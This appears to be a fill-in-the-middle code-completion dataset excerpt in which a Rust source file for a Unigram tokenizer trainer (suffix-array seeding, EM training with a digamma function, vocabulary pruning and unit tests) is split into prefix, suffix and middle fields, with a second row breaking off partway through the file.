file_name large_stringlengths 4 140 | prefix large_stringlengths 0 39k | suffix large_stringlengths 0 36.1k | middle large_stringlengths 0 29.4k | fim_type large_stringclasses 4
values |
|---|---|---|---|---|
trainer.rs | use crate::models::unigram::{lattice::Lattice, model::Unigram};
use crate::tokenizer::{AddedToken, Result, Trainer};
use crate::utils::parallelism::*;
use crate::utils::progress::{ProgressBar, ProgressStyle};
use log::debug;
use serde::{Deserialize, Serialize};
use std::cmp::Reverse;
use std::collections::{HashMap, HashSet};
use std::convert::TryInto;
// A token and a score
type SentencePiece = (String, f64);
// A full sentence or word + its count within the dataset
type Sentence = (String, u32);
fn digamma(mut x: f64) -> f64 |
/// Errors that can occur while training a Unigram model.
#[derive(thiserror::Error, Debug)]
pub enum UnigramTrainerError {
    /// Raised when `vocab_size` is smaller than the number of distinct
    /// required characters, so they cannot all fit in the vocabulary.
    #[error("The vocabulary is not large enough to contain all chars")]
    VocabularyTooSmall,
}
/// Convert raw scores into log-probabilities, in place.
///
/// Each score becomes `ln(score) - ln(total)`, so the resulting values
/// form a normalized log-probability distribution over `pieces`.
fn to_log_prob(pieces: &mut [SentencePiece]) {
    let total: f64 = pieces.iter().map(|(_, score)| score).sum();
    let log_total = total.ln();
    pieces
        .iter_mut()
        .for_each(|(_, score)| *score = score.ln() - log_total);
}
/// A `UnigramTrainer` can train a `Unigram` model from `word_counts`.
#[non_exhaustive]
#[derive(Builder, Debug, Clone, Serialize, Deserialize)]
pub struct UnigramTrainer {
    /// Whether to display a progress bar during training.
    #[builder(default = "true")]
    pub show_progress: bool,
    /// Target size of the final vocabulary, special tokens included
    /// (see `finalize`, which subtracts `special_tokens.len()`).
    #[builder(default = "8000")]
    pub vocab_size: u32,
    /// Number of EM sub-iterations per pruning round (see `do_train`).
    #[builder(default = "2")]
    pub n_sub_iterations: u32,
    /// Fraction of pieces kept at each pruning round
    /// (see `prune_sentence_pieces`).
    #[builder(default = "0.75")]
    pub shrinking_factor: f64,
    /// Special tokens prepended to the vocabulary in `finalize`.
    #[builder(default = "vec![]")]
    pub special_tokens: Vec<AddedToken>,
    /// Characters that must be in the vocabulary even if absent from the data.
    #[builder(default = "HashSet::new()")]
    pub initial_alphabet: HashSet<char>,
    /// The unknown token, if any; `finalize` inserts it first when it is not
    /// already among `special_tokens`.
    #[builder(default = "None")]
    pub unk_token: Option<String>,
    /// Maximum length (in chars) a candidate sentence piece may have.
    #[builder(default = "16")]
    pub max_piece_length: usize,
    /// Cap on the number of seed pieces produced by `make_seed_sentence_pieces`.
    #[builder(default = "1_000_000")]
    seed_size: usize,
    /// word -> count map accumulated by `Trainer::feed`.
    #[builder(default = "HashMap::new()")]
    words: HashMap<String, u32>,
}
impl Default for UnigramTrainer {
    /// A trainer configured with all the builder defaults.
    // The builder cannot fail here since every field has a default.
    fn default() -> Self {
        Self::builder().build().unwrap()
    }
}
impl UnigramTrainer {
/// Create a builder to configure a `UnigramTrainer`.
pub fn builder() -> UnigramTrainerBuilder {
    UnigramTrainerBuilder::default()
}
/// Setup a progress bar if asked to show progress
fn setup_progress(&self) -> Option<ProgressBar> {
    if self.show_progress {
        // Length starts at 0; `update_progress` sets the real length later.
        let p = ProgressBar::new(0);
        p.set_style(
            ProgressStyle::default_bar()
                .template("[{elapsed_precise}] {msg:<40!} {wide_bar} {pos:<9!}/{len:>9!}"),
        );
        Some(p)
    } else {
        None
    }
}
/// A candidate piece is valid when it is non-empty and no longer than
/// `max_piece_length` chars.
///
/// Only the length is checked here; spaces, numbers, hiragana and more
/// are expected to be taken care of within pre_tokenizers.
/// https://github.com/google/sentencepiece/blob/26be9516cd81d5315ee31c48d2438018e0eab879/src/trainer_interface.cc#L203
fn is_valid_sentencepiece(&self, char_string: &[char]) -> bool {
    (1..=self.max_piece_length).contains(&char_string.len())
}
/// Build the final vocabulary from a trained model.
///
/// Ensures every `required_chars` entry is present (chars the model dropped
/// get scores slightly below `model.min_score`), fills the remaining slots
/// with the best model pieces up to `vocab_size` minus the special tokens,
/// sorts by decreasing score, and prepends the special tokens — inserting
/// `unk_token` at the front when it is not already one of them.
fn finalize(&self, model: Unigram, required_chars: HashSet<String>) -> Result<Unigram> {
    let mut min_score_penalty = 0.0;
    let min_score_penalty_delta = 0.0001;
    let mut pieces: Vec<(String, f64)> = vec![];
    let mut inserted: HashSet<String> = HashSet::new();
    // We don't want to include the <UNK> that was used to train
    inserted.insert("<UNK>".into());
    let existing_pieces: HashMap<String, f64> = model.iter().cloned().collect();
    for c in required_chars {
        if let Some(t) = existing_pieces.get(&c) {
            // The model kept this char: reuse its learned score.
            inserted.insert(c.clone());
            pieces.push((c, *t));
        } else {
            // Missing required char: score it just below everything else,
            // each subsequent one slightly lower than the previous.
            let score = model.min_score + min_score_penalty;
            inserted.insert(c.clone());
            pieces.push((c, score));
            min_score_penalty += min_score_penalty_delta;
        }
    }
    // Locate the unk token among the special tokens; when requested but
    // absent, it will be added at index 0 below.
    let (unk_id, need_add_unk) = if let Some(ref unk) = self.unk_token {
        let unk_id = self.special_tokens.iter().enumerate().find_map(|(i, t)| {
            if t.content == *unk {
                Some(i)
            } else {
                None
            }
        });
        match unk_id {
            Some(id) => (Some(id), false),
            None => (Some(0), true),
        }
    } else {
        (None, false)
    };
    // Reserve room for the special tokens (and the extra unk, if added).
    let vocab_size_without_special_tokens = if need_add_unk {
        self.vocab_size as usize - self.special_tokens.len() - 1
    } else {
        self.vocab_size as usize - self.special_tokens.len()
    };
    // Fill remaining slots with model pieces not already inserted above;
    // NaN scores (the training-time unk) are clamped to 0.0.
    for (token, score) in model.iter() {
        if inserted.contains::<str>(token) {
            continue;
        }
        inserted.insert(token.to_string());
        pieces.push((token.to_string(), if score.is_nan() { 0.0 } else { *score }));
        if pieces.len() == vocab_size_without_special_tokens {
            break;
        }
    }
    // Sort by decreasing score.
    pieces.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
    // Insert the necessary tokens
    let mut special_tokens = self
        .special_tokens
        .iter()
        .map(|t| (t.content.clone(), 0.0))
        .collect::<Vec<_>>();
    if need_add_unk {
        special_tokens.insert(0, (self.unk_token.clone().unwrap(), 0.0));
    }
    Unigram::from(
        special_tokens.into_iter().chain(pieces).collect(),
        unk_id,
        model.byte_fallback(),
    )
}
/// Collect every character that must appear in the final vocabulary:
/// all characters seen in the training words plus the configured
/// `initial_alphabet`, each as a single-character `String`.
fn required_chars(&self, word_counts: &[Sentence]) -> HashSet<String> {
    let mut chars: HashSet<String> = HashSet::new();
    for (word, _count) in word_counts {
        chars.extend(word.chars().map(|c| c.to_string()));
    }
    chars.extend(self.initial_alphabet.iter().map(|c| c.to_string()));
    chars
}
/// Generate the initial ("seed") sentence pieces from the raw sentences.
///
/// Concatenates all sentences ('\0'-separated), runs a suffix-array pass
/// (esaxx) to find frequent substrings, always includes every individual
/// character, scores candidates by `freq * len`, caps the list at
/// `seed_size`, and converts the scores to log-probabilities.
fn make_seed_sentence_pieces(
    &self,
    sentences: &[Sentence],
    _progress: &Option<ProgressBar>,
) -> Vec<SentencePiece> {
    // Put all sentences in a string, separated by \0
    let total: usize = sentences
        .iter()
        .map(|(s, _)| s.chars().count())
        .sum::<usize>()
        + sentences.len();
    let mut flat_string = String::with_capacity(total);
    let mut all_chars: HashMap<char, u32> = HashMap::new();
    let c_sentence_boundary = '\0';
    let k_sentence_boundary = '\0'.to_string();
    for (string, n) in sentences {
        if string.is_empty() {
            continue;
        }
        flat_string.push_str(string);
        // XXX
        // Comment suggests we add sentence boundary, but it seems to be missing from actual
        // code in spm.
        flat_string.push_str(&k_sentence_boundary);
        // Count every char, weighted by the sentence's dataset count.
        for c in string.chars() {
            if c != c_sentence_boundary {
                *all_chars.entry(c).or_insert(0) += n;
            }
        }
    }
    flat_string.shrink_to_fit();
    // Suffix-array extraction; the fast C++ backend is feature-gated.
    #[cfg(feature = "esaxx_fast")]
    let suffix = esaxx_rs::suffix(&flat_string).unwrap();
    #[cfg(not(feature = "esaxx_fast"))]
    let suffix = esaxx_rs::suffix_rs(&flat_string).unwrap();
    // Basic chars need to be in sentence pieces.
    let mut seed_sentencepieces: Vec<SentencePiece> = vec![];
    let mut sall_chars: Vec<_> = all_chars.into_iter().map(|(a, b)| (b, a)).collect();
    // Reversed order
    sall_chars.sort_by_key(|&a| Reverse(a));
    // Candidate substrings from the suffix array, scored by freq * length;
    // single chars and anything crossing a sentence boundary are dropped.
    let mut substr_index: Vec<_> = suffix
        .iter()
        .filter_map(|(string, freq)| {
            if string.len() <= 1 {
                return None;
            }
            if string.contains(&c_sentence_boundary) {
                return None;
            }
            if !self.is_valid_sentencepiece(string) {
                return None;
            }
            let score = freq * string.len() as u32;
            // if let Some(p) = &progress {
            //     p.inc(1);
            // }
            Some((score, string))
        })
        .collect();
    // Fill seed_sentencepieces
    for (count, character) in sall_chars {
        seed_sentencepieces.push((character.to_string(), count.into()));
    }
    // sort by decreasing score
    substr_index.sort_by_key(|&a| Reverse(a));
    for (score, char_string) in substr_index {
        // Just in case
        assert!(self.is_valid_sentencepiece(char_string));
        let string: String = char_string.iter().collect();
        seed_sentencepieces.push((string, score.into()));
        if seed_sentencepieces.len() >= self.seed_size {
            break;
        }
    }
    // Convert the raw counts into log-probabilities.
    to_log_prob(&mut seed_sentencepieces);
    seed_sentencepieces
}
/// Prune the piece inventory down to roughly `shrinking_factor` of its
/// current size (never below `vocab_size * 1.1`), keeping the pieces whose
/// removal would hurt the unigram LM likelihood the most.
fn prune_sentence_pieces(
    &self,
    model: &Unigram,
    pieces: &[SentencePiece],
    sentences: &[Sentence],
) -> Vec<SentencePiece> {
    let mut always_keep = vec![true; pieces.len()];
    let mut alternatives: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
    let bos_id = pieces.len() + 1;
    let eos_id = pieces.len() + 2;
    // First, segments the current sentencepieces to know
    // how each sentencepiece is resegmented if this sentencepiece is removed
    // from the vocabulary.
    // To do so, we take the second best segmentation of sentencepiece[i].
    // alternatives[i] stores the sequence of second best sentencepieces.
    for (id, (token, _score)) in pieces.iter().enumerate() {
        // id 0 is the training-time <UNK>; it is carried over separately.
        if id == 0 {
            always_keep[id] = false;
            continue;
        }
        let mut lattice = Lattice::from(token, bos_id, eos_id);
        model.populate_nodes(&mut lattice);
        let nbests = lattice.nbest(2);
        if nbests.len() == 1 {
            // No alternative segmentation at all: must keep.
            always_keep[id] = true;
        } else if nbests[0].len() >= 2 {
            // The best segmentation already splits this piece: droppable.
            always_keep[id] = false;
        } else if nbests[0].len() == 1 {
            // The piece is its own best segmentation: record the runner-up
            // as its replacement in case it gets removed.
            always_keep[id] = true;
            for node in &nbests[1] {
                let alt_id = node.borrow().id;
                alternatives[id].push(alt_id);
            }
        }
    }
    // Second, segments all sentences to compute likelihood
    // with a unigram language model. inverted[i] stores
    // the set of sentence index where the sentencepieces[i] appears.
    let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
    let indexed_sentences: Vec<(usize, &Sentence)> = sentences.iter().enumerate().collect();
    let collected: (f64, Vec<f64>, Vec<Vec<usize>>) = indexed_sentences
        .maybe_par_chunks(chunk_size)
        .map(|enumerated_sentence_count_chunk| {
            let mut vsum = 0.0;
            let mut freq: Vec<f64> = vec![0.0; pieces.len()];
            let mut inverted: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
            for (i, (sentence, count)) in enumerated_sentence_count_chunk {
                let mut lattice = Lattice::from(sentence, bos_id, eos_id);
                model.populate_nodes(&mut lattice);
                vsum += *count as f64;
                for node_ref in lattice.viterbi() {
                    let id = node_ref.borrow().id;
                    freq[id] += *count as f64;
                    inverted[id].push(*i);
                }
            }
            (vsum, freq, inverted)
        })
        .reduce(
            || (0.0, vec![0.0; pieces.len()], vec![Vec::new(); pieces.len()]),
            |(vsum, freq, inverted), (lvsum, lfreq, linverted)| {
                (
                    vsum + lvsum,
                    freq.iter()
                        .zip(lfreq)
                        .map(|(global_el, local_el)| global_el + local_el)
                        .collect(),
                    inverted
                        .iter()
                        .zip(linverted)
                        .map(|(global_el, local_el)| [&global_el[..], &local_el[..]].concat())
                        .collect(),
                )
            },
        );
    let (vsum, freq, inverted) = collected;
    let sum: f64 = freq.iter().sum();
    let logsum = sum.ln();
    let mut candidates: Vec<(usize, f64)> = vec![];
    let mut new_pieces: Vec<SentencePiece> = Vec::with_capacity(self.vocab_size as usize);
    // Piece 0 (<UNK>) is always carried over.
    new_pieces.push(pieces[0].clone());
    // Finally, computes how likely the LM likelihood is reduced if
    // the sentencepiece[i] is removed from the vocabulary.
    // Since the exact computation of loss is difficult, we compute the
    // loss approximately by assuming that all sentencepiece[i] in the sentences
    // are replaced with alternatives[i] when sentencepiece[i] is removed.
    for (id, (token, score)) in pieces.iter().enumerate() {
        if id == 0 {
            continue;
        }
        if freq[id] == 0.0 && !always_keep[id] {
            // not found in Viterbi path. Can remove this entry safely.
            continue;
        } else if alternatives[id].is_empty() {
            // no alternatives. Keeps this entry.
            new_pieces.push((token.to_string(), *score));
        } else {
            let mut f = 0.0; // the frequency of pieces[i];
            for n in &inverted[id] {
                let score = sentences[*n].1 as f64;
                f += score;
            }
            // TODO: Temporary hack to avoid Nans.
            if f == 0.0 || f.is_nan() {
                // new_pieces.push((token.to_string(), *score));
                continue;
            }
            f /= vsum; // normalizes by all sentence frequency.
            let logprob_sp = freq[id].ln() - logsum;
            // After removing the sentencepiece[i], its frequency freq[i] is
            // re-assigned to its alternatives:
            // new_sum = current_sum - freq[i] + freq[i] * alternatives[i].len()
            //         = current_sum + freq[i] * (alternatives[i].len() - 1)
            // BUGFIX: this previously used `alternatives.len()` (the total
            // number of pieces) instead of `alternatives[id].len()`, which
            // contradicts the formula above and inflated the denominator.
            // `alternatives[id]` is non-empty on this branch, so no underflow.
            let logsum_alt = (sum + freq[id] * (alternatives[id].len() - 1) as f64).ln();
            // The frequencies of alternatives are increased by freq[i].
            let mut logprob_alt = 0.0;
            for n in &alternatives[id] {
                logprob_alt += (freq[*n] + freq[id]).ln() - logsum_alt;
            }
            // loss: the diff of likelihood after removing the sentencepieces[i].
            let loss = f * (logprob_sp - logprob_alt);
            if loss.is_nan() {
                panic!("loss for piece {} is NaN", id);
            }
            candidates.push((id, loss));
        }
    }
    let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
    let pruned_size: usize = ((pieces.len() as f64) * self.shrinking_factor) as usize;
    let pruned_size = desired_vocab_size.max(pruned_size);
    // Keep the highest-loss candidates until the pruned size is reached.
    candidates.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
    for (id, _score) in candidates {
        if new_pieces.len() == pruned_size {
            break;
        }
        new_pieces.push(pieces[id].clone());
    }
    // `new_pieces` is already owned; no need for the previous `.to_vec()` clone.
    new_pieces
}
/// Update the progress bar with the new provided length and message
fn update_progress(&self, p: &Option<ProgressBar>, len: usize, message: &str) {
    if let Some(p) = p {
        p.set_message(message);
        p.set_length(len as u64);
        // Only redraw ~100 times over the whole run to limit terminal I/O.
        p.set_draw_delta(len as u64 / 100);
        p.reset();
    }
}
/// Set the progress bar in the finish state
fn finalize_progress(&self, p: &Option<ProgressBar>, final_len: usize) {
    if let Some(p) = p {
        p.set_length(final_len as u64);
        p.finish();
        // Leave the finished bar on its own line.
        println!();
    }
}
/// E-step of EM over all sentences (chunked, possibly in parallel).
///
/// Returns `(objective, ntokens, expected)`: the negative log-likelihood
/// normalized by total sentence frequency, the total Viterbi token count,
/// and the expected frequency of each piece.
fn run_e_step(&self, model: &Unigram, sentences: &[Sentence]) -> (f64, u32, Vec<f64>) {
    let all_sentence_freq: u32 = sentences.iter().map(|(_a, b)| *b).sum();
    // One chunk per thread (at least one sentence per chunk).
    let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
    let collected: (f64, u32, Vec<f64>) = sentences
        .maybe_par_chunks(chunk_size)
        .map(|sentences_chunk| {
            let mut expected: Vec<f64> = vec![0.0; model.len()];
            let mut objs: f64 = 0.0;
            let mut ntokens: u32 = 0;
            for (string, freq) in sentences_chunk {
                let mut lattice = Lattice::from(string, model.bos_id, model.eos_id);
                model.populate_nodes(&mut lattice);
                // `populate_marginal` accumulates expected piece counts into
                // `expected` and returns the sentence log-likelihood `z`.
                let z: f64 = lattice.populate_marginal(*freq as f64, &mut expected);
                if z.is_nan() {
                    panic!("likelihood is NAN. Input sentence may be too long.");
                }
                ntokens += lattice.viterbi().len() as u32;
                objs -= z / (all_sentence_freq as f64);
            }
            (objs, ntokens, expected)
        })
        // Merge per-chunk results: sums of objectives, token counts, and
        // element-wise sums of expectations.
        .reduce(
            || (0.0, 0, vec![0.0; model.len()]),
            |(objs, ntokens, expected), (lobjs, lntokens, lexpected)| {
                (
                    objs + lobjs,
                    ntokens + lntokens,
                    expected
                        .iter()
                        .zip(lexpected)
                        .map(|(global_el, local_el)| global_el + local_el)
                        .collect(),
                )
            },
        );
    collected
}
/// M-step of EM: re-estimate piece scores from the expected frequencies
/// computed in `run_e_step`, dropping pieces whose expectation falls below
/// a fixed threshold, then convert counts to log-probabilities through the
/// digamma function (sparse "Bayesianified" EM).
fn run_m_step(&self, pieces: &[SentencePiece], expected: &[f64]) -> Vec<SentencePiece> {
    if pieces.len() != expected.len() {
        panic!(
            "Those two iterators are supposed to be the same length ({} vs {})",
            pieces.len(),
            expected.len()
        );
    }
    let mut new_pieces: Vec<SentencePiece> =
        Vec::with_capacity(self.vocab_size.try_into().unwrap());
    let mut sum = 0.0;
    let expected_frequency_threshold = 0.5;
    for (i, (freq, (piece, _score))) in expected.iter().zip(pieces).enumerate() {
        // Always keep unk.
        if i == 0 {
            new_pieces.push((piece.clone(), f64::NAN));
            continue;
        }
        // Drop pieces the E-step barely used.
        if *freq < expected_frequency_threshold {
            continue;
        }
        new_pieces.push((piece.clone(), *freq));
        sum += freq;
    }
    // Here we do not use the original EM, but use the
    // Bayesianified/DPified EM algorithm.
    // https://cs.stanford.edu/~pliang/papers/tutorial-acl2007-talk.pdf
    // This modification will act as a sparse prior.
    let logsum = digamma(sum);
    let new_pieces: Vec<_> = new_pieces
        .into_iter()
        .map(|(s, c)| (s, digamma(c) - logsum))
        .collect();
    new_pieces
}
/// Main training entry point: seed pieces from a suffix array, refine with
/// EM, prune in a loop until `vocab_size * 1.1` pieces remain, then write
/// the finalized model into `model`. Returns the configured special tokens.
pub fn do_train(
    &self,
    sentences: Vec<Sentence>,
    model: &mut Unigram,
) -> Result<Vec<AddedToken>> {
    let progress = self.setup_progress();
    //
    // 1. Compute frequent substrings
    // TODO Should be able to upgrade to u64 when needed
    self.update_progress(&progress, sentences.len(), "Suffix array seeds");
    let mut pieces: Vec<SentencePiece> =
        Vec::with_capacity(self.vocab_size.try_into().unwrap());
    // We use a UNK token when training, whatever the `self.unk_token`
    pieces.push(("<UNK>".into(), f64::NAN));
    pieces.extend(self.make_seed_sentence_pieces(&sentences, &progress));
    self.finalize_progress(&progress, sentences.len());
    // Useful to check compatibility with spm.
    debug!(
        "Using {} pieces on {} sentences for EM training",
        pieces.len(),
        sentences.len()
    );
    let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
    // 2. Run E-M Loops to fine grain the pieces.
    // We will shrink the vocab by shrinking_factor every loop on average
    // Some other pieces are dropped if logprob is too small
    // V = N * (f)**k
    // k = log(V / N) / log(f)
    let expected_loops = (((desired_vocab_size as f64).ln() - (pieces.len() as f64).ln())
        / self.shrinking_factor.ln()) as usize
        + 1;
    let expected_updates = expected_loops * self.n_sub_iterations as usize;
    self.update_progress(&progress, expected_updates, "EM training");
    let required_chars = self.required_chars(&sentences);
    // Bail out early if the required chars alone exceed the vocabulary.
    if required_chars.len() as u32 > self.vocab_size {
        return Err(Box::new(UnigramTrainerError::VocabularyTooSmall));
    }
    // Index 0 (<UNK>) is used as the unk id during training.
    let mut new_model = Unigram::from(pieces.clone(), Some(0), false)?;
    loop {
        // Sub-EM iteration.
        for _iter in 0..self.n_sub_iterations {
            // Executes E step
            let (_objective, _num_tokens, expected) = self.run_e_step(&new_model, &sentences);
            // Executes M step.
            pieces = self.run_m_step(&pieces, &expected);
            new_model = Unigram::from(pieces.clone(), Some(0), false)?;
            // Useful comment for checking compatibility with spm
            // NOTE(review): the ratio below divides by `model.len()` — the
            // caller's *output* model, not `new_model`. This looks like it
            // was meant to be `new_model.len()`; confirm before changing,
            // as it only affects this debug log.
            debug!(
                "Em iter={} size={} obj={} num_tokens={} num_tokens/piece={}",
                _iter,
                new_model.len(),
                _objective,
                _num_tokens,
                _num_tokens as f64 / model.len() as f64
            );
            if let Some(p) = &progress {
                p.inc(1);
            }
        } // end of Sub EM iteration
        // Stops the iteration when the size of sentences reaches to the
        // desired symbol size.
        if pieces.len() <= desired_vocab_size {
            break;
        }
        // Prunes pieces.
        pieces = self.prune_sentence_pieces(&new_model, &pieces, &sentences);
        new_model = Unigram::from(pieces.clone(), Some(0), false)?;
    }
    self.finalize_progress(&progress, expected_updates);
    // Finally, adjusts the size of sentencepices to be |vocab_size|.
    *model = self.finalize(new_model, required_chars)?;
    Ok(self.special_tokens.clone())
}
}
impl Trainer for UnigramTrainer {
type Model = Unigram;
/// Train a Unigram model from the word counts collected by `feed`.
fn train(&self, model: &mut Unigram) -> Result<Vec<AddedToken>> {
    let sentences = self
        .words
        .iter()
        .map(|(word, count)| (word.clone(), *count))
        .collect::<Vec<_>>();
    self.do_train(sentences, model)
}
/// Whether we should show progress (mirrors the `show_progress` setting).
fn should_show_progress(&self) -> bool {
    self.show_progress
}
/// Tokenize every input sequence with `process`, count the resulting
/// words, and store the aggregated `word -> count` map in `self.words`.
/// The first `process` error aborts and is propagated.
fn feed<I, S, F>(&mut self, iterator: I, process: F) -> Result<()>
where
    I: Iterator<Item = S> + Send,
    S: AsRef<str> + Send,
    F: Fn(&str) -> Result<Vec<String>> + Sync,
{
    // Each (possibly parallel) worker builds a local count map...
    let words: Result<HashMap<String, u32>> = iterator
        .maybe_par_bridge()
        .map(|sequence| {
            let words = process(sequence.as_ref())?;
            let mut map = HashMap::new();
            for word in words {
                map.entry(word).and_modify(|c| *c += 1).or_insert(1);
            }
            Ok(map)
        })
        // ...and the maps are merged by summing counts per word.
        .reduce(
            || Ok(HashMap::new()),
            |acc, ws| {
                let mut acc = acc?;
                for (k, v) in ws? {
                    acc.entry(k).and_modify(|c| *c += v).or_insert(v);
                }
                Ok(acc)
            },
        );
    self.words = words?;
    Ok(())
}
}
#[cfg(test)]
mod tests {
use super::*;
use assert_approx_eq::assert_approx_eq;
use std::iter::FromIterator;
// Seed-piece generation on a tiny bilingual corpus: checks both the
// extracted strings and their log-prob scores (values cross-checked
// against spm, per the comments in `make_seed_sentence_pieces`).
#[test]
fn test_unigram_chars() {
    let trainer = UnigramTrainerBuilder::default()
        .show_progress(false)
        .build()
        .unwrap();
    let sentences = vec![
        ("This is a".to_string(), 1),
        ("こんにちは友達".to_string(), 1),
    ];
    // 6 distinct latin chars (incl. space) + 7 kana/kanji = 13.
    let required_chars = trainer.required_chars(&sentences);
    assert_eq!(required_chars.len(), 13);
    let progress = None;
    let table = trainer.make_seed_sentence_pieces(&sentences, &progress);
    let target_strings = vec![
        "s", "i", " ", "達", "友", "ん", "は", "に", "ち", "こ", "h", "a", "T", "is ", "s ",
    ];
    let strings: Vec<_> = table.iter().map(|(string, _)| string).collect();
    assert_eq!(strings, target_strings);
    let scores = table.iter().map(|(_, score)| score);
    // Expected log-probs; the trailing comment is the raw count.
    let target_scores = vec![
        -2.5649493574615367, // 2.0
        -2.5649493574615367, // 2.0
        -2.5649493574615367, // 2.0
        -3.258096538021482,  // 1.0
        -3.258096538021482,  // 1.0
        -3.258096538021482,  // 1.0
        -3.258096538021482,  // 1.0
        -3.258096538021482,  // 1.0
        -3.258096538021482,  // 1.0
        -3.258096538021482,  // 1.0
        -3.258096538021482,  // 1.0
        -3.258096538021482,  // 1.0
        -3.258096538021482,  // 1.0
        -1.4663370687934272, // 6.0
        -1.8718021769015916, // 4.0
    ];
    for (score, target_score) in scores.zip(target_scores) {
        assert_approx_eq!(*score, target_score, 0.01);
    }
}
// `required_chars` must union the chars seen in the data with the
// configured `initial_alphabet`.
#[test]
fn test_initial_alphabet() {
    let trainer = UnigramTrainerBuilder::default()
        .show_progress(false)
        .initial_alphabet(HashSet::from_iter(vec!['a', 'b', 'c', 'd', 'e', 'f']))
        .build()
        .unwrap();
    let sentences = vec![("こんにちは友達".to_string(), 1)];
    let required_chars = trainer.required_chars(&sentences);
    assert_eq!(
        required_chars,
        vec!["こ", "ん", "に", "ち", "は", "友", "達", "a", "b", "c", "d", "e", "f"]
            .into_iter()
            .map(|s| s.to_owned())
            .collect::<HashSet<_>>()
    );
}
// Placement of the unk token in the final vocabulary (see `finalize`).
#[test]
fn test_unk_token() {
    // 1. Should add `unk_token` as first special token
    let trainer = UnigramTrainerBuilder::default()
        .show_progress(false)
        .special_tokens(vec![
            AddedToken::from("[SEP]", true),
            AddedToken::from("[CLS]", true),
        ])
        .unk_token(Some("[UNK]".into()))
        .build()
        .unwrap();
    let mut unigram = Unigram::default();
    trainer
        .do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
        .unwrap();
    let mut pieces = unigram.iter();
    assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
    assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
    assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
    // 2. Let it where it is (already among the special tokens)
    let trainer = UnigramTrainerBuilder::default()
        .show_progress(false)
        .special_tokens(vec![
            AddedToken::from("[SEP]", true),
            AddedToken::from("[CLS]", true),
            AddedToken::from("[UNK]", true),
        ])
        .unk_token(Some("[UNK]".into()))
        .build()
        .unwrap();
    let mut unigram = Unigram::default();
    trainer
        .do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
        .unwrap();
    let mut pieces = unigram.iter();
    assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
    assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
    assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
    // 3. Don't put it there if not needed (no unk_token configured)
    let trainer = UnigramTrainerBuilder::default()
        .show_progress(false)
        .build()
        .unwrap();
    let mut unigram = Unigram::default();
    trainer
        .do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
        .unwrap();
    let mut pieces = unigram.iter();
    assert_eq!(pieces.next().unwrap().0, "e".to_string());
}
// Special tokens must come first in the final vocabulary, in the
// order they were configured.
#[test]
fn test_special_tokens() {
    let trainer = UnigramTrainerBuilder::default()
        .show_progress(false)
        .special_tokens(vec![
            AddedToken::from("[SEP]", true),
            AddedToken::from("[CLS]", true),
        ])
        .build()
        .unwrap();
    let mut unigram = Unigram::default();
    trainer
        .do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
        .unwrap();
    let mut pieces = unigram.iter();
    assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
    assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
}
// `to_log_prob` normalizes raw scores into log-probabilities in place.
#[test]
fn test_to_log_prob() {
    let mut a = vec![("".to_string(), 1.0), ("".to_string(), 2.0)];
    to_log_prob(&mut a);
    let scores = a.iter().map(|(_, score)| *score).collect::<Vec<_>>();
    // ln(1) - ln(3)
    assert_approx_eq!(scores[0], -1.098, 0.01);
    // ln(2) - ln(3)
    assert_approx_eq!(scores[1], -0.405, 0.01);
}
}
| {
let mut result = 0.0;
while x < 7.0 {
result -= 1.0 / x;
x += 1.0;
}
x -= 1.0 / 2.0;
let xx = 1.0 / x;
let xx2 = xx * xx;
let xx4 = xx2 * xx2;
result += x.ln() + (1.0 / 24.0) * xx2 - 7.0 / 960.0 * xx4 + (31.0 / 8064.0) * xx4 * xx2
- (127.0 / 30720.0) * xx4 * xx4;
result
} | identifier_body |
trainer.rs | use crate::models::unigram::{lattice::Lattice, model::Unigram};
use crate::tokenizer::{AddedToken, Result, Trainer};
use crate::utils::parallelism::*;
use crate::utils::progress::{ProgressBar, ProgressStyle};
use log::debug;
use serde::{Deserialize, Serialize};
use std::cmp::Reverse;
use std::collections::{HashMap, HashSet};
use std::convert::TryInto;
// A token and a score
type SentencePiece = (String, f64);
// A full sentence or word + its count within the dataset
type Sentence = (String, u32);
/// Digamma function ψ(x) for positive `x`.
///
/// Applies the recurrence ψ(x) = ψ(x + 1) − 1/x until the argument is at
/// least 7, then evaluates the asymptotic series of ψ at the shifted
/// midpoint `x − 1/2`.
fn digamma(mut x: f64) -> f64 {
    // Recurrence step: each +1 shift of x contributes −1/x.
    let mut acc = 0.0;
    while x < 7.0 {
        acc -= 1.0 / x;
        x += 1.0;
    }
    // Asymptotic expansion evaluated at the midpoint.
    x -= 1.0 / 2.0;
    let inv = 1.0 / x;
    let inv2 = inv * inv;
    let inv4 = inv2 * inv2;
    acc += x.ln() + (1.0 / 24.0) * inv2 - 7.0 / 960.0 * inv4 + (31.0 / 8064.0) * inv4 * inv2
        - (127.0 / 30720.0) * inv4 * inv4;
    acc
}
/// Errors that can occur while training a Unigram model.
#[derive(thiserror::Error, Debug)]
pub enum UnigramTrainerError {
    /// Raised when `vocab_size` is smaller than the number of distinct
    /// required characters, so they cannot all fit in the vocabulary.
    #[error("The vocabulary is not large enough to contain all chars")]
    VocabularyTooSmall,
}
/// Convert raw scores into log-probabilities, in place.
///
/// Each score becomes `ln(score) - ln(total)`, so the resulting values
/// form a normalized log-probability distribution over `pieces`.
fn to_log_prob(pieces: &mut [SentencePiece]) {
    let total: f64 = pieces.iter().map(|(_, score)| score).sum();
    let log_total = total.ln();
    pieces
        .iter_mut()
